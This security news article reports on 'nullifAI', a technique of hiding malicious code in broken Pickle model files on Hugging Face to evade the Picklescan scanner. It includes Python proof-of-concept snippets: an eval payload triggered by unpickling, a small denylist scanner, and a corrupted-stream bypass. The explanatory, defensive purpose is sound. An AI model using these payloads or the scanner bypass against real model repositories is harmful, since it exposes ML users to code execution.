Attackers hide malicious code in Hugging Face AI model Pickle files

Like all repositories of open-source software in recent years, AI model hosting platform Hugging Face has been abused by attackers to upload trojanized projects and assets with the goal of infecting unsuspecting users. The latest technique observed by researchers involves intentionally broken but poisoned Python object serialization files called Pickle files.

Often described as the GitHub for machine learning, Hugging Face is the largest online hosting database for open-source AI models and other machine learning assets. In addition to hosting services, the platform provides collaboration features for developers to share their own apps, model transformations, and model fine-tunings.

"During RL research efforts, the team came upon two Hugging Face models containing malicious code that were not flagged as 'unsafe' by Hugging Face's security scanning mechanisms," researchers from security firm ReversingLabs wrote in a new report. "RL has named this technique 'nullifAI,' because it involves evading existing protections in the AI community for an ML model."

While Hugging Face supports machine learning (ML) models in various formats, Pickle is among the most prevalent thanks to the popularity of PyTorch, a widely used ML library written in Python that relies on Pickle serialization and deserialization for its models. Pickle is the official Python module for object serialization, which means turning an object into a byte stream; the reverse process is known as deserialization. In Python terminology, the two operations are called pickling and unpickling.

Serialization and deserialization, especially of input from untrusted sources, have been the cause of many remote code execution vulnerabilities across a variety of programming languages. Accordingly, the Python documentation for Pickle carries a big red warning: "It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never unpickle data that could have come from an untrusted source, or that could have been tampered with."

That poses a problem for an open platform like Hugging Face, where users openly share model data that others then have to unpickle. On one hand, this opens the potential for abuse by ill-intentioned individuals who upload poisoned models; on the other, banning the format would be too restrictive given PyTorch's popularity. Hugging Face therefore chose a middle road: attempt to scan for and detect malicious Pickle files.

This scanning is done with an open-source tool dubbed Picklescan, which essentially implements a blacklist of dangerous methods and objects that could be referenced in Pickle files, such as eval, exec, compile, and open.

However, researchers from security firm Checkmarx recently showed that this blacklist approach is insufficient and cannot catch all possible abuse methods. First, they demonstrated a bypass based on Bdb.run instead of exec, Bdb being a debugger built into Python. When that was reported and blocked, they found another bypass using an asyncio gadget that still relied on built-in Python functionality.
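To make the risk concrete, here is a minimal, self-contained Python sketch, not taken from the ReversingLabs report: an attacker-controlled __reduce__ method causes code to run during unpickling, and a deliberately simplified blacklist scan in the spirit of Picklescan walks the opcode stream looking for dangerous imports. The Malicious class, the naive_scan helper, and the tiny DENYLIST are illustrative assumptions; the real tool covers far more opcodes and globals.

    import pickle
    import pickletools

    # Illustrative class (not from the report): __reduce__ instructs the
    # unpickler to call eval during deserialization; the print() expression
    # is a harmless stand-in for an attacker's payload.
    class Malicious:
        def __reduce__(self):
            return (eval, ("print('malicious code ran')",))

    # Protocol 3 keeps the example simple: imported callables appear as
    # GLOBAL opcodes that carry the module and name in clear text.
    payload = pickle.dumps(Malicious(), protocol=3)

    # Toy blacklist scan in the spirit of Picklescan (not the real tool,
    # which also handles STACK_GLOBAL and many more dangerous globals).
    DENYLIST = {("builtins", "eval"), ("builtins", "exec"), ("builtins", "compile")}

    def naive_scan(data: bytes) -> bool:
        for opcode, arg, _pos in pickletools.genops(data):
            if opcode.name == "GLOBAL" and arg:
                module, _, name = str(arg).partition(" ")
                if (module, name) in DENYLIST:
                    return True
        return False

    print(naive_scan(payload))   # True: the eval reference is visible
    # pickle.loads(payload)      # would run eval("print('malicious code ran')")

Running naive_scan flags the file, but calling pickle.loads on it would execute the payload regardless; detection and deserialization are entirely separate steps, which is the gap the attacks below exploit.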

Bad pickles

The two malicious models found by ReversingLabs used a much simpler approach: they messed with the format the tool expects. The PyTorch format is essentially a Pickle file compressed with ZIP, but the attackers compressed these files with 7-Zip (7z), so the default torch.load() function would fail on them. This also caused Picklescan to fail to detect them.

Once unpacked, the malicious Pickle files turned out to have malicious Python code injected at the start, essentially breaking the byte stream. The rogue code, when executed, opened a platform-aware reverse shell that connected back to a hardcoded IP address.

That got the ReversingLabs researchers wondering: how would Picklescan behave if it encountered a Pickle file in a broken format? First they created a malicious but valid file, which Picklescan correctly flagged as suspicious, triggering a warning. Then they created a file with malicious code injected at the start but with a binunicode ('X') Pickle opcode toward the end of the byte stream that broke the stream before the normal 0x2E (STOP) opcode was reached.

Picklescan produced a parsing error when it encountered the X opcode, but gave no warning about the suspicious functions found earlier in the file, which had already been executed by the time the X opcode triggered the parsing error.

"The failure to detect the presence of a malicious function poses a serious problem for AI development organizations," the researchers wrote. "Pickle file deserialization works in a different way from Pickle security scanning tools. Picklescan, for example, first validates Pickle files and, if they are validated, performs security scanning. Pickle deserialization, however, works like an interpreter, interpreting opcodes as they are read, but without first conducting a comprehensive scan to determine if the file is valid, or whether it is corrupted at some later point in the stream."
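The asymmetry the researchers describe between a validate-first scanner and the streaming unpickler can be reproduced with the standard library alone. The sketch below is an illustration under assumed corrupting bytes, not the actual nullifAI samples: it builds a valid malicious pickle, then replaces the STOP opcode with a truncated binunicode opcode so the payload sits before the break, with pickletools standing in for the validation pass.

    import pickle
    import pickletools

    class Payload:
        def __reduce__(self):
            # Harmless stand-in for the reverse-shell code in the real samples
            return (eval, ("print('payload executed')",))

    good = pickle.dumps(Payload(), protocol=3)
    assert good.endswith(b".")          # a valid stream ends with STOP (0x2E)

    # Corrupt the tail: drop STOP and append a binunicode ('X') opcode whose
    # declared length runs past the end of the data, so the stream breaks
    # only after the malicious REDUCE call (illustrative bytes, not the
    # actual nullifAI files).
    broken = good[:-1] + b"X\xff\xff\xff\xff"

    # A validate-first pass over the opcodes chokes on the malformed tail
    # and reports nothing about what came before it...
    try:
        list(pickletools.genops(broken))
    except Exception as exc:
        print("static parse failed:", exc)

    # ...while the streaming unpickler has already executed the payload by
    # the time it reaches the corrupted bytes.
    try:
        pickle.loads(broken)
    except Exception as exc:
        print("unpickling failed only after the payload ran:", exc)

Run as-is, the script prints the payload's message before either error appears: the static pass fails without flagging anything, while the unpickler has already executed the injected call.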

Avoid pickles from strangers

The developers of Picklescan were notified, and the tool was updated to identify threats in broken Pickle files rather than waiting for a file to be validated first. Even so, organizations should remain wary of models from untrusted sources delivered as Pickle files, even if they have been scanned with tools such as Picklescan; other bypasses are likely to be found in the future, because blacklists are never perfect.

"Our conclusion: Pickle files present a security risk when used on a collaborative platform where consuming data from untrusted sources is the basic part of the workflow," the researchers wrote.
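The researchers stop at general wariness, but for teams that must load PyTorch checkpoints from outside sources, one widely used precaution, which the article itself does not prescribe, is to refuse full Pickle deserialization and load tensors only. The sketch below assumes a PyTorch version whose torch.load() supports the weights_only flag.

    import torch

    def load_untrusted_checkpoint(path: str):
        # weights_only=True restricts unpickling to an allowlist of tensor
        # and container types, so a __reduce__-style payload raises an
        # error instead of executing (requires a PyTorch release that
        # supports the flag).
        return torch.load(path, map_location="cpu", weights_only=True)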

First seen on csoonline.com

Jump to article: www.csoonline.com/article/3819920/attackers-hide-malicious-code-in-hugging-face-ai-model-pickle-files.html
